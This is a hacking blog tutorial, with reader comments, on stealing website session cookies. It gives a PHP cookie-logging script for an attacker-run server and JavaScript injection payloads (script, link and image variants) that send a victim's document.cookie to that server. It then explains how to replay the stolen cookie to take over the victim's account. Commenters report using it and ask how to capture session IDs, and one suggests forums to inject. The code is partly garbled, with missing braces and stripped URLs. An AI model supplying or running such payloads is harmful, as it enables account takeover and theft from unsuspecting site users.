Get FREE lessons from "Hack It Easy Hacking Course"

Enter your email and instantly receive the lessons in your inbox for free

Thursday, January 13, 2011

Session hijacking or cookie stealing using php and javascript

In computer science, session hijacking refers to the exploitation of a valid computer session—sometimes also called a session key—to gain unauthorized access to information or services in a computer system. In particular, it is used to refer to the theft of a magic cookie used to authenticate a user to a remote server. It has particular relevance to web developers, as the HTTP cookies used to maintain a session on many web sites can be easily stolen by an attacker using an intermediary computer or with access to the saved cookies on the victim's computer (see HTTP cookie theft).

Here we show how you can hack a session using javascript and php.

What is a cookie?

A cookie known as a web cookie or http cookie is a small piece of text stored by the user browser.A cookie is sent as an header by the web server to the web browser on the client side.A cookie is static and is sent back by the browser unchanged everytime it accesses the server.
A cookie has a expiration time that is set by the server and are deleted automatically after the expiration time.
Cookie is used to maintain users authentication and to implement shopping cart during his navigation,possibly across multiple visits.

What can we do after stealing cookie?

Well,as we know web sites authenticate their user's with a cookie,it can be used to hijack the victims session.The victims stolen cookie can be replaced with our cookie to hijack his session.

This is a cookie stealing script that steals the cookies of a user and store them in a text file, these cookied can later be utilised.

PHP Code:

function GetIP()
if (getenv("HTTP_CLIENT_IP") && strcasecmp(getenv("HTTP_CLIENT_IP"), "unknown"))
$ip = getenv("HTTP_CLIENT_IP");
else if (getenv("HTTP_X_FORWARDED_FOR") && strcasecmp(getenv("HTTP_X_FORWARDED_FOR"), "unknown"))
$ip = getenv("HTTP_X_FORWARDED_FOR");
else if (getenv("REMOTE_ADDR") && strcasecmp(getenv("REMOTE_ADDR"), "unknown"))
$ip = getenv("REMOTE_ADDR");
else if (isset($_SERVER['REMOTE_ADDR']) && $_SERVER['REMOTE_ADDR'] && strcasecmp($_SERVER['REMOTE_ADDR'], "unknown"))
$ip = "unknown";

function logData()
$cookie = $_SERVER['QUERY_STRING'];
$register_globals = (bool) ini_get('register_gobals');
if ($register_globals) $ip = getenv('REMOTE_ADDR');
else $ip = GetIP();

$rem_port = $_SERVER['REMOTE_PORT'];
$user_agent = $_SERVER['HTTP_USER_AGENT'];
$rqst_method = $_SERVER['METHOD'];
$rem_host = $_SERVER['REMOTE_HOST'];
$referer = $_SERVER['HTTP_REFERER'];
$date=date ("l dS of F Y h:i:s A");
$log=fopen("$ipLog", "a+");

if (preg_match("/\bhtm\b/i", $ipLog) || preg_match("/\bhtml\b/i", $ipLog))
fputs($log, "IP: $ip | PORT: $rem_port | HOST: $rem_host | Agent: $user_agent | METHOD: $rqst_method | REF: $referer | DATE{ : } $date | COOKIE: $cookie
fputs($log, "IP: $ip | PORT: $rem_port | HOST: $rem_host | Agent: $user_agent | METHOD: $rqst_method | REF: $referer | DATE: $date | COOKIE: $cookie \n\n");



Save the script as a cookielogger.php on your server.
(You can get any free webhosting easily such as justfree,x10hosting etc..)

Create an empty text file log.txt in the same directory on the webserver. The hijacked/hacked cookies will be automatically stored here.

Now for the hack to work we have to inject this piece of javascript into the target's page. This can be done by adding a link in the comments page which allows users to add hyperlinks etc. But beware some sites dont allow javascript so you gotta be lucky to try this.

The best way is to look for user interactive sites which contain comments or forums.

Post the following code which invokes or activates the cookielogger on your host.

<script language="Java script">
document.location="; + document.cookie;

Your can also trick the victim into clicking a link that activates javascript.
Below is the code which has to be posted.

<a href="java script:document.location=''+document.cookie;">Click here!</a>

Clicking an image also can activate the script.For this purpose you can use the below code.

<a href="java script:document.location=''+document.cookie;"&gt;

<img src="URL OF THE IMAGE"/></a>

All the details like cookie,ipaddress,browser of the victim are logged in to log.txt on your hostserver

In the above codes please remove the space in between javascript.

Hijacking the Session:

Now we have cookie,what to do with this..?
Download cookie editor mozilla plugin or you may find other plugins as well.

Go to the target site-->open cookie editor-->Replace the cookie with the stolen cookie of the victim and refresh the page.Thats it!!!you should now be in his account. Download cookie editor mozilla plugin from here :

Don't forget to comment if you like my post.
by hackiteasy


hi rohit,
the code is perfectly fine and working. Can you be a bit more specific what errors did u face??

it works fine but whenever it gets the info it leaves the cookie field blank :/


IP: **.**.***.** | PORT: ***** | HOST: | Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 | METHOD: | REF: | DATE: Saturday 28th 2011f May 2011 05:56:38 AM | COOKIE:

works great but for cookies i just get two squashed up 0's
really i am looking for phpsessid
is there away of getting their phpsessid when they click on the link and then it gets saved to log.txt
really need your help on this!
much appreciated!

works great however i am trying to get the phpsessid from the users that click on the link!
is that possible!

man itx workin ..but in cookie section didn't find cookie..:(

IP: ***.**.**.** | PORT: **| HOST: | Agent: Mozilla/5.0 (Windows NT 5.1; rv:7.0.1) Gecko/20100101 Firefox/7.0.1 | METHOD: | REF: | DATE: Friday 07th 2011f October 2011 09:09:57 AM | COOKIE:

This one is not telling the cookie... because their is no cookie associated with the site we visited.

This will steal cookies from the site where the link is present.

Well... will try to improve this thing.. But this one's great to keep a track of all computer's IP you ever visited.

will this method work for a target user using mobile browser like opera mini

I really don know what to do guy. will you tell me clearly

in my case. It sent empty cookie :-s
could you tell me how to do?

it dont work for random php section id

Note.. PHP Seesion HiJacking is a real old method of "hacking" ... Its not going to always work the way you want it unless its being done on an old/vulnerable site. Other than that this tutorial and his coding is perfectly fine and is the correct way to get what you need done, its just as I said though, need to use it on a site that is vulnerable to this. Unfortunately not all are anymore. You may be able to find some forums where you can inject a XSS in the calender and when they click on your event set in the calender it will capture the session ID. I forgot which forum is vulnerable but there are still a few that may be vuln. Just not all..

what i send to the reciever which link please help

ho get it cookie but i think its not cookie becouse cookie look like this 12342e424f42f3efv4jk423 and in log file i recive url adress of person who click on my scripe if this url help to open id tell me how i open


   First Name:
* Your Email Address:


Twitter Delicious Facebook Digg Stumbleupon Favorites More